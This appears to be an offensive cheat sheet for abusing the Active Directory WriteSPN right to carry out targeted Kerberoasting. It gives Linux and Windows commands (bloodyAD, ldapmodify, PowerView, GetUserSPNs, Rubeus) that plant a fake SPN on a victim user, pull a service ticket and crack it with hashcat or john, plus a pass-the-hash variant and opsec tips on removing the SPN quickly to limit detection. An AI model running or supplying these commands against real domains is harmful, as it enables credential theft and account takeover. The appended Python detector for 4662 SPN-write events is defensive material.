WriteSPN

Source can write the servicePrincipalName attribute on the target user, enabling targeted Kerberoasting

Applies to: User/Group/Computer → User


Linux Abuse

Step 1: Write a fake SPN to the target user

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    set object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

Step 2: Request TGS ticket (Kerberoast)

GetUserSPNs.py <domain>/<username>:'<password>' -dc-ip <dc-ip> \
    -request-user <target-user> -outputfile <target-user>_tgs.txt

Step 3: Crack

hashcat -m 13100 <target-user>_tgs.txt /usr/share/wordlists/rockyou.txt
john <target-user>_tgs.txt --wordlist=/usr/share/wordlists/rockyou.txt

Step 4: Cleanup (remove fake SPN)

bloodyad -u <username> -p '<password>' -d <domain> --host <dc-ip> \
    remove object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

With hash (pass-the-hash variant)

bloodyad -u <username> --hashes :<ntlm-hash> -d <domain> --host <dc-ip> \
    set object <target-user> servicePrincipalName -v 'http/fakespn.<domain>'

GetUserSPNs.py -hashes :<ntlm-hash> <domain>/<username> -dc-ip <dc-ip> \
    -request-user <target-user> -outputfile <target-user>_tgs.txt

Via ldapmodify

ldapmodify -H ldap://<dc-ip> -D '<username>@<domain>' -w '<password>' <<EOF
dn: CN=<target-user>,CN=Users,DC=<domain>,DC=<tld>
changetype: modify
add: servicePrincipalName
servicePrincipalName: http/fakespn.<domain>
EOF

Windows Abuse

Step 1: Set SPN

Set-DomainObject -Identity <target-user> -Set @{serviceprincipalname='http/fakespn.<domain>'} -Credential $cred

Step 2: Kerberoast

Get-DomainSPNTicket -Identity <target-user> -OutputFormat Hashcat | Select-Object -ExpandProperty Hash

Step 2 alt: Rubeus

Rubeus.exe kerberoast /user:<target-user> /nowrap /format:hashcat

Step 3: Cleanup

Set-DomainObject -Identity <target-user> -Clear serviceprincipalname -Credential $cred

Opsec

  • Adding the SPN generates a 4662 event for the directory modification and can be caught by detections watching for SPN writes on user objects (not computer accounts)
  • Remove the SPN immediately after obtaining the hash to minimize exposure window
  • Prefer targeting users with weak/crackable passwords; if the account has a strong password this technique yields nothing
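The detection the Opsec note refers to, as an added example that is not part of the original cheat sheet: it flags 4662 records that write servicePrincipalName on user objects (not computers) and pairs writes by the same subject on the same user inside a short window, which is the set-then-clear pattern above. It assumes a SACL auditing Write Property on user objects is in place and runs over constructed sample records; the schema GUIDs are Microsoft's documented values and should be verified against your forest.

```python
from datetime import datetime, timedelta

# schemaIDGUIDs from the AD schema reference (assumption: verify in your forest)
SPN_ATTR_GUID = "f3a64788-5306-11d1-a9c5-0000f80367c1"   # attribute servicePrincipalName
USER_CLASS_GUID = "bf967aba-0de6-11d0-a285-00aa003049e2"  # class user
WRITE_PROP = 0x20                                         # ADS_RIGHT_DS_WRITE_PROP

def is_user_spn_write(ev):
    """True for a 4662 record that writes servicePrincipalName on a user object.
    4662 does not carry the written value; 5136 would, if object-change auditing is on."""
    return (ev["EventID"] == 4662
            and ev["ObjectType"].strip("{}").lower() == USER_CLASS_GUID
            and bool(int(ev["AccessMask"], 16) & WRITE_PROP)
            and SPN_ATTR_GUID in ev["Properties"].lower())

def short_lived_spn_writes(events, window=timedelta(minutes=15)):
    """Return (subject, target, seconds) for two SPN writes by the same subject on
    the same user within `window`: an SPN that was set and cleared again quickly."""
    hits = sorted((e for e in events if is_user_spn_write(e)), key=lambda e: e["Time"])
    pairs = []
    for i, first in enumerate(hits):
        for later in hits[i + 1:]:
            same = (later["SubjectUserName"] == first["SubjectUserName"]
                    and later["ObjectName"] == first["ObjectName"])
            if same and later["Time"] - first["Time"] <= window:
                pairs.append((first["SubjectUserName"], first["ObjectName"],
                              int((later["Time"] - first["Time"]).total_seconds())))
    return pairs

# Constructed sample records; field names follow the 4662 EventData layout.
T0 = datetime(2024, 1, 1, 9, 0, 0)
SVC = "CN=svc-backup,CN=Users,DC=corp,DC=local"
SPN_PROPS = "Write Property\n\t{f3a64788-5306-11d1-a9c5-0000f80367c1}"
SAMPLE_EVENTS = [
    # SPN written on a user, then written again three minutes later (cleanup)
    {"EventID": 4662, "Time": T0, "SubjectUserName": "alice", "ObjectName": SVC,
     "ObjectType": "{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x20",
     "Properties": SPN_PROPS},
    {"EventID": 4662, "Time": T0 + timedelta(minutes=3), "SubjectUserName": "alice",
     "ObjectName": SVC, "ObjectType": "{bf967aba-0de6-11d0-a285-00aa003049e2}",
     "AccessMask": "0x20", "Properties": SPN_PROPS},
    # SPN write on a computer object: routine, different class GUID, not flagged
    {"EventID": 4662, "Time": T0, "SubjectUserName": "WS01$", "ObjectName": "CN=WS01,CN=Computers,DC=corp,DC=local",
     "ObjectType": "{bf967a86-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x20",
     "Properties": SPN_PROPS},
    # Read Property on a user's SPN: not a write, not flagged
    {"EventID": 4662, "Time": T0, "SubjectUserName": "bob", "ObjectName": SVC,
     "ObjectType": "{bf967aba-0de6-11d0-a285-00aa003049e2}", "AccessMask": "0x10",
     "Properties": "Read Property\n\t{f3a64788-5306-11d1-a9c5-0000f80367c1}"},
]
```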